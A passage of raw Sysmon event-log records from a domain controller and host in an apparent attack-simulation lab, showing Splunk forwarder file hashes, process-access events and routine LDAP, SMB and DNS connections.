21:50:13.735{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917849Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:13.387{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28720AAD46197575509F8544B70A4E93,SHA256=7970B0E000A0CFC57CD1A08FBE6D7B9D06806DD0A26CC345AB28A15075D3FB7E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005917848Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:10.124{896A638B-B5C0-6058-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local1513-truefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local445microsoft-ds 354300x80000000000000005917847Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:10.124{896A638B-B5C0-6058-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local1513-truefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local445microsoft-ds 354300x80000000000000005917846Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:10.034{896A638B-B5C8-6058-0B00-00000000AE01}612C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-792.attackrange.local1512winsfalse10.0.1.14win-dc-792.attackrange.local389ldap 354300x80000000000000005917845Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:10.034{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1512winsfalse10.0.1.14win-dc-792.attackrange.local389ldap 354300x80000000000000005917844Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:10.027{896A638B-B5C8-6058-0B00-00000000AE01}612C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local1511-truefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local389ldap 354300x80000000000000005917843Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:10.027{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local1511-truefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local389ldap 354300x80000000000000005917842Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:09.749{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1510-false10.0.1.12-8000- 23542300x8000000000000000638603Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:14.819{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=752BA1120A5998D583219CE0DCA64800,SHA256=14CD937F326E3B3F9BE966013149E4657858571AFE0989AABBE46EE0F0870A8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917857Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:14.867{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=64FD522E3465AC04C5E5997ADBE21CA4,SHA256=1781299FCEF46F7B5DF4941F4A12E30F206B8777C80C32529B10794F052D7F25,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917856Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:14.735{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917855Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:14.735{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917854Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:14.395{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B36E8646CCB7CC2C80C5CE40CC1E603,SHA256=A8BF74E9C01E857F15E81537F6BACD99A3A9254F7F59C2771E68FA9358772295,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638604Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:15.882{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAACB0CC2FBA710FBC8C4AC0EDEA281E,SHA256=0DF15EC295AEA27B4F1113B3F77E2765BF547AEEE9839C358E84B3B5258C01C9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917863Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:15.736{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917862Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:15.736{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917861Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:15.462{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66AD98294BCE38494ED9107E010A9909,SHA256=0A04738CEACF80331A91E5DDFA9BA10AC1085140FD1030C64337229A628C8F6A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917860Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:15.455{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917859Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:15.455{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005917858Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:12.541{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local49516- 23542300x8000000000000000638608Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:16.913{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21B2F7B94ADBF192E3B38B89225383A0,SHA256=0D1F3BA40969703943869A159480E4F2CB15F3BA4009FD08710F95E43730F27C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917866Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:16.736{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917865Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:16.736{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917864Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:16.489{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=216B067BA774D38FF9AB0325A326B180,SHA256=D18336500FBA25681EBAE3D8562AB5DBFD052D80F4349C2A21E63790B381D445,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638607Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:12.396{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57259-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638606Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:16.147{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2483BC3AE77B357508695AAE0F6955C2,SHA256=44A21CC8C3DF439F45304CB988C412E99CD388C52D336BC3A9CF3396F858AA78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638605Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:16.147{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=803F8CDB01C19776F76B6B1ABB82A23A,SHA256=108192FA51CD47C581D94FAB9D33F280335CEC564FD35993AB5BAB96F7295019,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638609Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:17.913{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAC28B3204D72F968390D1D723AE7B39,SHA256=78C43DDF51928C00336F0A677D3561DC2B4F324EECF29557A3271869ADAE5DDD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917870Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:17.736{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917869Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:17.736{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917868Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:17.499{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01B438819F7390570E6699EA3C13B563,SHA256=C309E6E410FFEF022DF7A4031A78807633F35BB04B1E72CCF518BEA479090A6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917867Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:17.194{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E9CC9E40E1F212F44DE4840D28C381AF,SHA256=9FB3DD37446543A45499ED57EE0D083DDDFF5447B4597D5B5F9E766139BE3607,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638610Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:18.929{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=547729DFE9A00CBC4CE440210322074C,SHA256=F708E0FAE8E7EA8226676DD999E2C999DACFF2D461298468E4CAC694BC213BF2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917874Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:18.736{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917873Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:18.736{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917872Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:18.507{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E71613F510BCDFCCD69337CAD092783C,SHA256=41C9C27DC0AB019A97FC915D49B68FEDC828ACB3DA445FD9C020A05B6DE128E9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005917871Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:14.874{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1514-false10.0.1.12-8000- 23542300x8000000000000000638611Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:19.944{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E3221798ACE22D1E0606489CB04FDF5,SHA256=1F2E1A0F99808376D831FA721884910DD64611DB974D37D40ECF49169C5E2F3A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917914Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.940{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917913Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.940{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917912Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.936{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917911Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:19.935{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917910Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 